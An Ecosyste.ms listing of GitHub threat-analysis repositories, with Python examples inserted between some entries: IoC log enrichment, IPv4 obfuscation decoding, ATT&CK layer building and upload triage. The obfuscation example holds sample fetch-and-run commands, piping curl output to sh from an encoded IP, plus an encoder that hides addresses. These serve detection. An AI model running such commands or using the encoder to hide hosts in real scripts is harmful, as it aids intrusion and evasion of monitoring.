Ecosyste.ms: Repos

An open API service providing repository metadata for many open source software ecosystems.

GitHub topics: threat-analysis

deepfence/ThreatMapper

Open source cloud native security observability platform. Linux, K8s, AWS Fargate and more.

Language: TypeScript - Size: 215 MB - Last synced: 23 days ago - Pushed: 23 days ago - Stars: 4,630 - Forks: 566

InQuest/ThreatIngestor

Extract and aggregate threat intelligence.

Language: Python - Size: 1.65 MB - Last synced: 1 day ago - Pushed: 3 months ago - Stars: 790 - Forks: 133

ecstatic-nobel/OSweep

Don't Just Search OSINT. Sweep It.

Language: Python - Size: 43.5 MB - Last synced: 1 day ago - Pushed: over 3 years ago - Stars: 303 - Forks: 70

tatsuiman/malware-traffic-analysis.net

Download pcap files from http://www.malware-traffic-analysis.net/

Size: 912 MB - Last synced: 1 day ago - Pushed: over 6 years ago - Stars: 69 - Forks: 21

t4d/PhishingKitHunter

Find phishing kits which use your brand/organization's files and image.

Language: Python - Size: 29.3 KB - Last synced: 17 days ago - Pushed: over 5 years ago - Stars: 221 - Forks: 64

cowrie/cowrie

Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

Language: Python - Size: 9.49 MB - Last synced: 27 days ago - Pushed: 29 days ago - Stars: 4,903 - Forks: 846

mishalhossin/DetectXDiscord

This Discord bot is designed to provide file scanning functionality using the VirusTotal API to check for viruses and other malware in attachments uploaded to a Discord channel.

Language: Python - Size: 36.1 KB - Last synced: 17 days ago - Pushed: 12 months ago - Stars: 5 - Forks: 1

CYB3RMX/Qu1cksc0pe

All-in-One malware analysis tool.

Language: YARA - Size: 107 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1,096 - Forks: 163

MISP/MISP

MISP (core software) - Open Source Threat Intelligence and Sharing Platform

Language: PHP - Size: 136 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 4,963 - Forks: 1,335

zdhenard42/SOC-Multitool

A powerful and user-friendly browser extension that streamlines investigations for security professionals.

Language: JavaScript - Size: 35.2 KB - Last synced: about 1 month ago - Pushed: 9 months ago - Stars: 308 - Forks: 41

Graylog2/graylog-plugin-threatintel

Graylog Processing Pipeline functions that enrich log messages with IoC information from threat intelligence databases

Language: Java - Size: 1.68 MB - Last synced: 30 days ago - Pushed: 2 months ago - Stars: 145 - Forks: 21

MISP/misp-decaying-models

MISP decaying models

Language: Shell - Size: 7.81 KB - Last synced: about 2 months ago - Pushed: almost 4 years ago - Stars: 9 - Forks: 4
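The Graylog threat-intel plugin entry and the MISP decaying-models entry above describe two halves of one pipeline: matching indicators against incoming log messages, and lowering an indicator's weight as it ages so that stale IoCs stop producing alerts. The following Python is an added example that is not code from either project. It extracts IPs, domains and SHA-256 hashes from a message, matches them against a small indicator set, and scores each match with a polynomial decay (assumed here, in the shape of MISP's default model, but not taken from MISP's code). The indicator fields, the enrichment field names (`threat_indicated`, `threat_indicators`, `threat_score`) and the log lines are constructed for the example.

```python
"""Enrich log messages with IoC matches, scoring each match with a decaying model."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Indicator:
    """One IoC plus the parameters a decaying model needs (field names are assumptions)."""
    ioc_type: str         # "ip", "domain" or "sha256"
    value: str
    base_score: float     # confidence at the last sighting, 0..100
    lifetime_days: float  # after this many days without a sighting the score is 0
    decay_speed: float    # >1 slows the early decay, <1 speeds it up
    last_seen: datetime


def decayed_score(ind: Indicator, now: datetime) -> float:
    """Polynomial decay, assumed here in the shape of MISP's default model:
    score = base * (1 - (age / lifetime) ** (1 / decay_speed)), floored at 0."""
    age_days = (now - ind.last_seen).total_seconds() / 86400.0
    if age_days <= 0:
        return ind.base_score
    if age_days >= ind.lifetime_days:
        return 0.0
    return ind.base_score * (1.0 - (age_days / ind.lifetime_days) ** (1.0 / ind.decay_speed))


NOW = datetime(2024, 5, 1, 10, 5, tzinfo=timezone.utc)
SAMPLE_HASH = hashlib.sha256(b"constructed sample payload").hexdigest()

# Constructed IoC set: a fresh IP, a long-expired domain and an ageing file hash.
SAMPLE_IOCS = [
    Indicator("ip", "203.0.113.7", 80, 30, 3, NOW - timedelta(days=2)),
    Indicator("domain", "bad-update.example", 90, 60, 1, NOW - timedelta(days=90)),
    Indicator("sha256", SAMPLE_HASH, 100, 365, 1, NOW - timedelta(days=100)),
]

# Constructed log lines of the kind a pipeline rule would see.
SAMPLE_LOGS = [
    "2024-05-01T10:00:00Z sshd: Accepted password for root from 203.0.113.7 port 52211",
    "2024-05-01T10:01:00Z proxy: GET http://bad-update.example/x.bin 200",
    f"2024-05-01T10:02:00Z edr: quarantined file sha256={SAMPLE_HASH}",
    "2024-05-01T10:03:00Z sshd: Accepted publickey for ops from 198.51.100.9 port 40122",
]

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
_SHA256 = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def extract_observables(message: str) -> dict[str, set[str]]:
    """Pull candidate IPs, domains and SHA-256 hashes out of a message (lower-cased)."""
    return {
        "ip": set(_IPV4.findall(message)),
        "domain": {d.lower() for d in _DOMAIN.findall(message)},
        "sha256": {h.lower() for h in _SHA256.findall(message)},
    }


def enrich(message: str, iocs: list[Indicator], now: datetime, threshold: float = 20.0) -> dict:
    """Return the fields to add to the message; empty when nothing scores at or above threshold.
    The field names are assumptions, not the plugin's own schema."""
    observed = extract_observables(message)
    hits = []
    for ioc in iocs:
        if ioc.value.lower() in observed.get(ioc.ioc_type, set()):
            score = decayed_score(ioc, now)
            if score >= threshold:
                hits.append((ioc.value, round(score, 1)))
    if not hits:
        return {}
    return {
        "threat_indicated": True,
        "threat_indicators": sorted(v for v, _ in hits),
        "threat_score": max(s for _, s in hits),
    }


def enrich_all(messages: list[str], iocs: list[Indicator], now: datetime) -> list[dict]:
    return [enrich(m, iocs, now) for m in messages]


if __name__ == "__main__":
    for line, fields in zip(SAMPLE_LOGS, enrich_all(SAMPLE_LOGS, SAMPLE_IOCS, NOW)):
        print(line[:60], "->", fields or "no match")
```

With the constructed set, the two-day-old IP still scores about 48 and the hash about 73, while the domain last seen 90 days ago with a 60-day lifetime has decayed to zero and is not added to the message at all. Tuning `lifetime_days` and `decay_speed` per indicator type is what keeps a large feed from turning every old IP into an alert.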

barleybobs/DisTrace

DisTrace is a collection of Python scripts designed to assist in tracking, analysing and disrupting malware campaigns that use Discord for command and control (C2).

Language: Python - Size: 17.6 KB - Last synced: about 2 months ago - Pushed: about 2 months ago - Stars: 2 - Forks: 0

ethansilvas/google-cybersecurity

Projects, notes, and write-ups I have done while completing the Google Cybersecurity Certificate

Language: Jupyter Notebook - Size: 5.13 MB - Last synced: about 2 months ago - Pushed: 7 months ago - Stars: 29 - Forks: 14

AppThreat/threat-db

A graph database for components, vulnerabilities and threats powered by dgraph

Language: Python - Size: 1.26 MB - Last synced: 17 days ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1

CERTCC/Vulnerability-Data-Archive

With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools

Size: 70.2 MB - Last synced: 2 months ago - Pushed: almost 4 years ago - Stars: 82 - Forks: 25

reportsmishing/public_code

Bunch of scripts helping to investigate smishing URLs

Language: Python - Size: 9.77 KB - Last synced: 14 days ago - Pushed: 11 months ago - Stars: 1 - Forks: 0

reportsmishing/knowledgebase

Size: 1.41 MB - Last synced: 14 days ago - Pushed: 8 months ago - Stars: 3 - Forks: 0

ethansilvas/security-plus

Notes and practice exam analysis I completed when preparing for my CompTIA Security+ exam

Size: 272 MB - Last synced: about 2 months ago - Pushed: 6 months ago - Stars: 3 - Forks: 0

satan1a/TheRoadOfSO

Notes from learning security operations | The knowledge base of security operations

Language: HTML - Size: 21.8 MB - Last synced: 2 months ago - Pushed: 9 months ago - Stars: 588 - Forks: 133

CloudDefenseAI/falco_extended_rules

Curating Falco rules with MITRE ATT&CK Matrix

Language: Python - Size: 102 KB - Last synced: 3 months ago - Pushed: 3 months ago - Stars: 62 - Forks: 9

ion-storm/sysmon-config Fork of SwiftOnSecurity/sysmon-config

Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.

Language: PowerShell - Size: 1.56 MB - Last synced: 3 months ago - Pushed: 6 months ago - Stars: 741 - Forks: 142

TalEliyahu/Threat_Model_Examples

Collection of Threat Models

Size: 70.3 KB - Last synced: 4 months ago - Pushed: almost 2 years ago - Stars: 333 - Forks: 49

curated-intel/Threat-Actor-Profile-Guide

The Threat Actor Profile Guide for CTI Analysts

Size: 645 KB - Last synced: 4 months ago - Pushed: 10 months ago - Stars: 79 - Forks: 11

alvin-tosh/Infosec-and-Hacking-Scripts

🚀 This is a collection of hacking and pentesting scripts to help with enumeration, OSINT, exploitation and post-exploitation, automated to make hacking easier. Have fun! 😎

Language: Python - Size: 9.76 MB - Last synced: 4 months ago - Pushed: 4 months ago - Stars: 117 - Forks: 38

bobby-tablez/IP-Obfuscator

Hide an IP address in scripts using hex/decimal/octal conversions

Language: PowerShell - Size: 185 KB - Last synced: 5 months ago - Pushed: 5 months ago - Stars: 51 - Forks: 9
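The IP-Obfuscator entry above describes hiding an address by writing it in hex, decimal or octal, all of which `inet_aton`-style parsers accept. As an added example (not the project's own code), the following Python shows both sides: producing the alternative spellings of an address, and normalising any of them back to dotted-quad so a detection can match them. It implements the classic `inet_aton` parsing rules itself rather than calling `socket.inet_aton`, whose acceptance of these forms differs between glibc and Windows. The sample script lines and the heuristic thresholds in `find_obfuscated_ipv4` are assumptions made for the example.

```python
"""Encode IPv4 addresses in the alternative forms inet_aton accepts, and decode them back."""
from __future__ import annotations

import ipaddress
import re

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]+")  # leading zero plus at least one more octal digit
_DEC = re.compile(r"[0-9]+")   # note: "08"/"09" are treated as decimal here
# A dotted run of 1..4 numeric parts that is not glued to other word characters.
_CANDIDATE = re.compile(
    r"(?<![\w.])(?:0[xX][0-9a-fA-F]+|[0-9]+)(?:\.(?:0[xX][0-9a-fA-F]+|[0-9]+)){0,3}(?![\w.])"
)


def _part(text: str) -> tuple[int, str]:
    """C-style numeric part: 0x.. is hex, 0.. is octal, otherwise decimal."""
    if _HEX.fullmatch(text):
        return int(text, 16), "hex"
    if _OCT.fullmatch(text):
        return int(text, 8), "octal"
    if _DEC.fullmatch(text):
        return int(text, 10), "decimal"
    raise ValueError(f"not a numeric part: {text!r}")


def normalize_ipv4(literal: str) -> str:
    """Apply the inet_aton rules: a.b.c.d, a.b.c (c fills 16 bits), a.b (b fills 24), a (32)."""
    parts = literal.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"{literal!r}: expected 1 to 4 parts")
    values = [_part(p)[0] for p in parts]
    *lead, last = values
    if any(v > 0xFF for v in lead):
        raise ValueError(f"{literal!r}: leading part exceeds one byte")
    tail_bits = 8 * (4 - len(lead))
    if last >= 1 << tail_bits:
        raise ValueError(f"{literal!r}: last part exceeds {tail_bits} bits")
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << tail_bits) | last
    return str(ipaddress.IPv4Address(n))


def obfuscate_ipv4(ip: str) -> dict[str, str]:
    """Produce the common alternative spellings of a dotted-quad address."""
    n = int(ipaddress.IPv4Address(ip))
    o = [int(x) for x in ip.split(".")]
    return {
        "decimal": str(n),
        "hex": f"0x{n:08X}",
        "dotted_octal": ".".join(f"0{x:o}" for x in o),
        "dotted_hex": ".".join(f"0x{x:02X}" for x in o),
        "three_part": f"{o[0]}.{o[1]}.{(o[2] << 8) | o[3]}",
    }


def find_obfuscated_ipv4(text: str) -> list[tuple[str, str]]:
    """Return (literal, decoded) pairs for IP literals written in a non-canonical form.

    Heuristic (assumed): a bare number of any base only counts once it reaches
    1.0.0.0 (2**24), and multi-part forms count only when some part is hex or
    octal. That keeps version strings like 3.14 and literals like 0x10 out of
    the results, at the cost of missing all-decimal a.b.c forms.
    """
    hits = []
    for match in _CANDIDATE.finditer(text):
        literal = match.group(0)
        try:
            parsed = [_part(p) for p in literal.split(".")]
            decoded = normalize_ipv4(literal)
        except ValueError:
            continue
        if len(parsed) == 1:
            suspicious = parsed[0][0] >= 1 << 24
        else:
            suspicious = any(kind != "decimal" for _, kind in parsed)
        if suspicious and decoded != literal:
            hits.append((literal, decoded))
    return hits


# Constructed sample of the kind of script lines a detection would scan.
SAMPLE_SCRIPT = (
    "Invoke-WebRequest http://0xC0A80101/stage.ps1\n"
    "curl -s http://3232235777/x | sh\n"
    "ping -c 1 0300.0250.01.01\n"
    "Write-Host 'agent version 3.14, build 2023'\n"
)

if __name__ == "__main__":
    for form, value in obfuscate_ipv4("192.168.1.1").items():
        print(f"{form:13} {value:22} -> {normalize_ipv4(value)}")
    print(find_obfuscated_ipv4(SAMPLE_SCRIPT))
```

Every form returned by `obfuscate_ipv4` round-trips through `normalize_ipv4`, which is the property a detection needs: match on the decoded address, not on the literal as written. Proxy and EDR logs that record the URL verbatim will otherwise miss `http://3232235777/` entirely.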

markmackensen/attack_layer_builder

A Python script to generate MITRE ATT&CK Navigator layers from TTPs

Language: Python - Size: 593 KB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1 - Forks: 0
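The two attack_layer_builder entries describe generating ATT&CK Navigator layers from TTPs. As an added example (not the project's own code), the following Python aggregates technique IDs reported by several sources into one layer, using the number of reporting sources as the score and adding unscored parent entries with `showSubtechniques` so that scored sub-techniques are visible when the layer loads. The sample reports, the version pins in `VERSIONS` and the gradient colours are assumptions; the layer keys used (`techniqueID`, `score`, `comment`, `enabled`, `showSubtechniques`, `gradient`, `domain`, `versions`) are the documented ones in the Navigator layer format.

```python
"""Build an ATT&CK Navigator layer from technique IDs extracted from reports."""
from __future__ import annotations

import json
import re

TECHNIQUE_ID = re.compile(r"^T\d{4}(?:\.\d{3})?$")

# Constructed input: TTPs extracted from three hypothetical reports.
SAMPLE_TTPS = {
    "report-a": ["T1566.001", "T1059.001", "T1047"],
    "report-b": ["T1566.001", "T1059.001", "T1021.002"],
    "report-c": ["T1059.001", "T1003.001", " t1566.001 "],  # sloppy input to normalise
}

# Assumed version pins; set them to the ATT&CK/Navigator versions you actually target.
VERSIONS = {"attack": "14", "navigator": "4.9.1", "layer": "4.5"}


def collect_techniques(ttps_by_source: dict[str, list[str]]) -> dict[str, set[str]]:
    """Map normalised technique ID -> set of sources reporting it; reject malformed IDs."""
    seen: dict[str, set[str]] = {}
    for source, ids in ttps_by_source.items():
        for raw in ids:
            tid = raw.strip().upper()
            if not TECHNIQUE_ID.match(tid):
                raise ValueError(f"{source}: {raw!r} is not an ID like T1059 or T1059.001")
            seen.setdefault(tid, set()).add(source)
    return seen


def build_layer(name: str, ttps_by_source: dict[str, list[str]],
                domain: str = "enterprise-attack") -> dict:
    """Return a Navigator layer dict; score = number of sources reporting the technique."""
    seen = collect_techniques(ttps_by_source)
    if not seen:
        raise ValueError("no techniques to plot")
    max_score = max(len(s) for s in seen.values())
    techniques = [
        {
            "techniqueID": tid,
            "score": len(sources),
            "comment": "reported by: " + ", ".join(sorted(sources)),
            "enabled": True,
        }
        for tid, sources in sorted(seen.items())
    ]
    # A scored sub-technique stays hidden until its parent is expanded, so add an
    # unscored parent entry with showSubtechniques for every parent not already listed.
    parents = {tid.split(".")[0] for tid in seen if "." in tid} - set(seen)
    techniques += [
        {"techniqueID": p, "enabled": True, "showSubtechniques": True}
        for p in sorted(parents)
    ]
    return {
        "name": name,
        "versions": VERSIONS,
        "domain": domain,
        "description": f"Techniques aggregated from {len(ttps_by_source)} source(s)",
        "techniques": techniques,
        "gradient": {"colors": ["#ffe766", "#ff6666"], "minValue": 1, "maxValue": max_score},
    }


def layer_json(layer: dict) -> str:
    return json.dumps(layer, indent=2)


def scores(layer: dict) -> dict[str, int]:
    """techniqueID -> score for the scored entries only (parents carry no score)."""
    return {t["techniqueID"]: t["score"] for t in layer["techniques"] if "score" in t}


if __name__ == "__main__":
    print(layer_json(build_layer("Campaign overlap", SAMPLE_TTPS)))
```

Validating the ID format before aggregation matters more than it looks: a report that writes `T1059.1` or `T-1059` would otherwise silently produce a technique the Navigator cannot place, and the layer would load with the entry quietly dropped.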

R4GN4R0K-SEC/R4GN4R0K-SEC.github.io

RAGNAR0K-SEC | Offensive CyberSec | CyberHacktivism | PenTesting | OSINT | lulz

Size: 12.7 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 0 - Forks: 0

markmackensen/ATTACK-Layer-Builder

A Python script to generate MITRE ATT&CK Navigator layers from TTPs

Language: Python - Size: 493 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 1 - Forks: 0

ecstatic-nobel/Analyst-Arsenal (archived)

A toolkit for Security Researchers

Language: Python - Size: 5.86 MB - Last synced: 6 months ago - Pushed: over 4 years ago - Stars: 120 - Forks: 36

Daethyra/OpenDTS (archived)

Open Domestic Threat Scanner - LLM Threat-Intelligence

Language: Python - Size: 60 MB - Last synced: 17 days ago - Pushed: 9 months ago - Stars: 2 - Forks: 0

401trg/detections

This repository contains all public indicators identified by 401trg during the course of our investigations. It also includes relevant yara rules and ids signatures to detect these indicators.

Language: Python - Size: 4.37 MB - Last synced: 6 months ago - Pushed: about 3 years ago - Stars: 120 - Forks: 19

izm1chael/threatnote Fork of brianwarehime/threatnote

threatnote | Cyber Threat Intelligence Notebook

Language: JavaScript - Size: 13.3 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0

vrikodar/DiaLog

DiaLog is a powerful log file analyzer that can also do passive analysis of malicious IPs found in web-server traffic

Language: Python - Size: 4.44 MB - Last synced: 7 months ago - Pushed: over 2 years ago - Stars: 5 - Forks: 0

danieleperera/SocAnalystArsenal (archived)

Quick SOC L1 ticket structure

Language: Python - Size: 4.52 MB - Last synced: 7 months ago - Pushed: almost 5 years ago - Stars: 30 - Forks: 13

ancailliau/SynSharp

A C# client for Vertex Synapse

Language: C# - Size: 282 KB - Last synced: 17 days ago - Pushed: 6 months ago - Stars: 2 - Forks: 1

jamesbower/EngagedThreat

The goal of Engaged Threat is to provide honeypot researchers the ability to hold the attention of an attacker or to induce the attacker to participate in some sort of increased activity.

Language: Shell - Size: 11.7 KB - Last synced: 4 months ago - Pushed: about 5 years ago - Stars: 7 - Forks: 1

MojtabaTajik/SecureBox

Safe virtual drive that prevents threats from being executed

Language: C# - Size: 206 KB - Last synced: 9 months ago - Pushed: 9 months ago - Stars: 3 - Forks: 2

jackaduma/ThreatReportExtractor

Extracting Attack Behavior from Threat Reports

Language: Python - Size: 21.6 MB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 53 - Forks: 13

jackaduma/SecBERT

Pretrained BERT model for cybersecurity text that has learned cybersecurity knowledge

Language: Python - Size: 490 KB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 81 - Forks: 17

cyph3rryx/CyberThreat-Monitor

CyberThreat Monitor (SIEM Lab) with Microsoft Azure is a comprehensive threat monitoring solution built on Azure Sentinel, providing real-time visibility into global cyber threats.

Language: PowerShell - Size: 1.41 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 1 - Forks: 0

0xElshazly/0xElshazly.github.io

Threat Analyst - Incident Response - Digital Forensics - Malware Analysis - Blue Team ~ Blog

Language: JavaScript - Size: 53.3 MB - Last synced: 8 months ago - Pushed: 8 months ago - Stars: 1 - Forks: 0

techathena/veritas

pcap analyser that uses REST APIs for IP/URL reputation and for extracting URLs

Language: Python - Size: 8.44 MB - Last synced: about 2 months ago - Pushed: over 3 years ago - Stars: 2 - Forks: 0

secnnet/AMSI-Scripts

Language: PowerShell - Size: 9.77 KB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0

sebdufourcq/SOC-Multitool-for-Firefox

A powerful and user-friendly browser extension that streamlines investigations for security professionals.

Language: JavaScript - Size: 12.7 KB - Last synced: 10 months ago - Pushed: 10 months ago - Stars: 0 - Forks: 0

blockboard/ThreatMapper Fork of deepfence/ThreatMapper

Identify vulnerabilities in running containers, images, hosts and repositories

Size: 9.84 MB - Last synced: 10 months ago - Pushed: almost 4 years ago - Stars: 2 - Forks: 2

dc401/py-vthashcheck

A proof of concept AWS Lambda Python 3.7 runtime that takes Amazon S3 objects, evaluates against file magic MIME types, and will check existing SHA256 hashes or upload the file to VirusTotal using an API key. The API key is retrieved using security best practices with AWS Secrets Manager cached to reduce API overhead.

Language: Python - Size: 13.1 MB - Last synced: 23 days ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0
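The py-vthashcheck entry above describes a pipeline: read an S3 object, classify it by file magic rather than by its name, then look up its SHA-256 before deciding whether to upload the file. As an added example (not the project's own code, and with no AWS or VirusTotal calls), the following Python implements that decision logic offline. The magic table, the scan-worthy types, the extension expectations and the sample objects are constructed for the example; the `lookup` callable stands in for a VirusTotal hash query (VirusTotal's v3 API exposes this as `GET /api/v3/files/{sha256}`) so a real client, with its key fetched from Secrets Manager, can be dropped in without changing the triage.

```python
"""Triage stored objects: sniff the real type, hash, look up, and only then consider upload."""
from __future__ import annotations

import hashlib
from dataclasses import dataclass
from typing import Callable, Optional

# Magic-byte signatures (prefix -> MIME type); a short table, not libmagic.
MAGIC = [
    (b"MZ", "application/vnd.microsoft.portable-executable"),
    (b"\x7fELF", "application/x-elf"),
    (b"%PDF", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "application/x-ole-storage"),
]
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

# Types worth a lookup; anything else is skipped unless its extension lies about it.
SCAN_WORTHY = {mime for _, mime in MAGIC}
EXT_EXPECTATION = {
    ".exe": "application/vnd.microsoft.portable-executable",
    ".dll": "application/vnd.microsoft.portable-executable",
    ".pdf": "application/pdf",
    ".zip": "application/zip",
    ".doc": "application/x-ole-storage",
    ".txt": "text/plain",
}


def sniff_mime(data: bytes) -> str:
    """Classify by content, never by the object key."""
    for sig, mime in MAGIC:
        if data.startswith(sig):
            return mime
    if data and all(b in TEXT_BYTES for b in data[:512]):
        return "text/plain"
    return "application/octet-stream"


@dataclass
class Verdict:
    key: str
    sha256: str
    mime: str
    action: str   # "skip" | "clean" | "flag" | "unknown" | "upload"
    detail: str


Lookup = Callable[[str], Optional[dict]]  # sha256 -> report dict, or None if unknown


def triage(key: str, data: bytes, lookup: Lookup, allow_upload: bool = False) -> Verdict:
    digest = hashlib.sha256(data).hexdigest()
    mime = sniff_mime(data)
    name = key.rsplit("/", 1)[-1]
    ext = name[name.rfind("."):].lower() if "." in name else ""
    mismatch = ext in EXT_EXPECTATION and EXT_EXPECTATION[ext] != mime
    if mime not in SCAN_WORTHY and not mismatch:
        return Verdict(key, digest, mime, "skip", "type not in scan list")
    note = f"extension {ext} claims {EXT_EXPECTATION[ext]} but content is {mime}; " if mismatch else ""
    report = lookup(digest)  # hash first: cheap, and it never discloses the file
    if report is not None:
        flagged = report.get("malicious", 0)
        return Verdict(key, digest, mime, "flag" if flagged > 0 else "clean",
                       note + f"{flagged} engines flagged")
    if allow_upload:
        return Verdict(key, digest, mime, "upload", note + "hash unknown; submitting file")
    return Verdict(key, digest, mime, "unknown", note + "hash unknown; upload disabled")


# Constructed sample objects; PE_STUB is only a header fragment, not a runnable binary.
PE_STUB = b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"PE\x00\x00"
PDF_STUB = b"%PDF-1.7\n%constructed\n"
TEXT_STUB = b"quarterly numbers, nothing to see\n"

# Stand-in for the hash lookup: only the PE stub is "known", with a constructed verdict.
KNOWN_HASHES = {hashlib.sha256(PE_STUB).hexdigest(): {"malicious": 12, "undetected": 48}}


def stub_lookup(sha256: str) -> Optional[dict]:
    return KNOWN_HASHES.get(sha256)


if __name__ == "__main__":
    for key, blob in [("uploads/report.txt", TEXT_STUB), ("uploads/setup.exe", PE_STUB),
                      ("uploads/notes.txt", PE_STUB), ("uploads/brochure.pdf", PDF_STUB)]:
        v = triage(key, blob, stub_lookup)
        print(f"{v.key:22} {v.mime:45} {v.action:8} {v.detail}")
```

`allow_upload` defaults to false on purpose: a hash lookup discloses nothing, but submitting the file shares it with the scanning service and its other users, which is rarely acceptable for customer uploads without an explicit policy decision. The extension check is the other practical point: `notes.txt` carrying an `MZ` header is exactly the case a name-based filter would wave through.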

scriptingislife/insight

Insight aids in profiling a host by searching several online services for information about an IP or domain name.

Language: Python - Size: 318 KB - Last synced: 11 months ago - Pushed: over 2 years ago - Stars: 3 - Forks: 0

scriptingislife/Mapper-Server

Map and visualize SSH logins from sensors.

Language: Python - Size: 86.9 KB - Last synced: 11 months ago - Pushed: almost 6 years ago - Stars: 3 - Forks: 2

JacYuan1/Malware-Analysis-Project

Analyze different types of malware with the use of static and dynamic analysis techniques.

Size: 2.87 MB - Last synced: about 1 year ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0

wisepythagoras/honeyshell

An SSH honeypot written entirely in Go.

Language: Go - Size: 154 KB - Last synced: about 2 months ago - Pushed: 3 months ago - Stars: 7 - Forks: 1

Truvis/Suricata_Threat-Hunting-Rules

Collection of Suricata rule sets that I use modified to my environments.

Size: 23.4 KB - Last synced: 12 months ago - Pushed: over 3 years ago - Stars: 27 - Forks: 9

jh00nbr/Phishruffus

Intelligent threat hunter for phishing servers

Language: Python - Size: 8.79 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 43 - Forks: 25

Avengers7/ThreatExchange

A threat exchange platform

Language: Python - Size: 4.88 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 4 - Forks: 0

security-union/going-fishing-with-my-raspberry-pi

Size: 1.04 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 21 - Forks: 5

ecstatic-nobel/IOC-Report (archived)

Generate a report containing IOCs gathered from VirusTotal and Hybrid-Analysis.

Language: Python - Size: 114 KB - Last synced: about 1 year ago - Pushed: about 5 years ago - Stars: 3 - Forks: 4

paulveillard/cybersecurity-threat-detection

An ongoing & curated collection of awesome software best practices and remediation techniques, libraries and frameworks, E-books and videos, Technical guidelines and important resources about Threat Detection & Hunting.

Size: 138 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 22 - Forks: 4

trickest/packages

Automated compromise detection of the world's most popular packages

Size: 5.27 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 10 - Forks: 2

katahiromz/AmsiScanner

Threat detector for Windows 10

Language: C++ - Size: 58.6 KB - Last synced: 13 days ago - Pushed: about 5 years ago - Stars: 3 - Forks: 1

AzAgarampur/PsForge

Process Hollowing demonstration & explanation

Language: C++ - Size: 382 KB - Last synced: about 1 year ago - Pushed: about 3 years ago - Stars: 25 - Forks: 7

CYB3RMX/C2Data

A database for captured data (malicious files etc.) from command and control servers.

Size: 3.91 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 3 - Forks: 0

tsumarios/AMAYARA-Lab

The アマヤラ Lab project provides a ready-to-use Jupyter Lab environment to help out with Android malware analysis using YARA rules.

Language: Jupyter Notebook - Size: 46.9 KB - Last synced: 10 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0

xakepnz/STRIKEWRITER

Looks up details on a public IPv4 address against IP-info and blacklist-search sites, providing a reputation check.

Language: Python - Size: 53.7 KB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 3

aishee/Yukio

Script to auto-generate rules from IOCs

Language: Python - Size: 6.84 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 2 - Forks: 0

ranguli/ip

ip: (the) i(nternet is) p(robably down)

Language: Python - Size: 4.67 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1

alan-analytics/kingstonThreatStudy

Repository for the Kingston University threat study

Language: R - Size: 8.31 MB - Last synced: 8 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0

ytisf/Maltego-OTX-Pulses

A set of Maltego transforms for OTX indicators and pulses

Language: Python - Size: 22.5 KB - Last synced: 13 days ago - Pushed: over 4 years ago - Stars: 1 - Forks: 1

west-wind/abuse-insights

Extracts the usernames attempted by a compromised host, taken from the comments on AbuseIPDB reports.

Language: Python - Size: 13.7 KB - Last synced: 7 months ago - Pushed: about 2 years ago - Stars: 1 - Forks: 0

Heimdall-Framework/heimdall-framework

USB threat evaluation framework for Linux

Language: Python - Size: 5.36 MB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 0

plushed/threatcalc

Calculate threat levels based on Capability, Opportunity, Intent ratings

Language: Python - Size: 18.8 MB - Last synced: about 1 year ago - Pushed: almost 4 years ago - Stars: 0 - Forks: 0

Heimdall-Framework/heimdall-paper

Size: 1.81 MB - Last synced: about 1 year ago - Pushed: about 4 years ago - Stars: 0 - Forks: 0

Piuliss/manati-docker

This repository contains the Dockerfile of the project ManaTI https://github.com/stratosphereips/Manati

Language: Shell - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: about 6 years ago - Stars: 3 - Forks: 1

ecstatic-nobel/Google-Indicator-Search

Programmatically find relationships between a list of strings using Google.

Language: Python - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: over 4 years ago - Stars: 2 - Forks: 1

MonoidalAttackTrees/Lina

A Haskell EDSL for conducting threat analysis using Attack Trees

